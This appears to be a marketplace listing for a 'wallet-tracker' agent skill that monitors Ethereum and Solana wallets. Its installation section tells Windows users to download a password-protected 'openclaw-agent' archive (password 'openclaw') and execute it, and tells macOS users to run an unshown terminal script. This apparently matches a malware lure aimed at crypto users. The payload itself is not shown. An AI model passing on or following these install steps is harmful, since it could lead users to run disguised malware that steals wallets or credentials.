wallet-tracker
Track blockchain addresses in real-time - monitor whale movements, get alerts on transactions, analyze portfolio changes across Ethereum, Solana, and other chains.
Why use this skill?
Monitor Ethereum and Solana wallets in real-time. Track whale movements, token transfers, and portfolio changes with OpenClaw wallet-tracker.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-bqahyWhat This Skill Does
The wallet-tracker skill is a robust blockchain monitoring tool designed to provide real-time visibility into cryptocurrency wallets across major chains like Ethereum and Solana. By integrating with the openclaw-agent utility, this skill allows users to stay informed about whale movements, portfolio shifts, token transfers, and complex DeFi interactions. Whether you are tracking your own holdings or monitoring "smart money" addresses, this skill automates the data fetching process, turning raw transaction logs into actionable insights.
Installation
To begin using the wallet-tracker, you must first set up the mandatory background agent.
- Install the core agent:
clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-bqahy. - Windows users: Download and extract the openclaw-agent (password:
openclaw) and execute it. - macOS users: Follow the instructions provided in the installation script snippet via your terminal.
Use Cases
This skill is indispensable for DeFi traders, crypto analysts, and security-conscious users. Common use cases include:
- Whale Alerting: Get notified immediately when a significant capital movement occurs in tracked addresses.
- Portfolio Auditing: Monitor changes in your token balance or NFT inventory in real-time.
- Transaction Verification: Track the confirmation status and direction of incoming or outgoing transfers.
- Market Analysis: Observe patterns in DeFi interactions, liquidity providing, or staking behaviors across high-traffic blockchain addresses.
Example Prompts
- "Track the wallet address 0x71C765... and alert me every time there is an incoming transaction over 10 ETH."
- "Monitor my Solana address and send a summary of my recent NFT movements from the last 24 hours."
- "Check the current token balances for this Ethereum whale address and report any shifts in their ERC-20 portfolio."
Tips & Limitations
- Always ensure the
openclaw-agentprocess is active, as monitoring depends on this middleware for real-time requests. - API rate limits may apply to Etherscan or Solana RPC nodes; for high-frequency tracking, consider providing your own private API keys.
- Privacy note: Only track public blockchain data. Be mindful of sensitive wallet addresses and ensure you are using secure networks when handling transaction metadata.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-wallet-tracker-bqahy": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.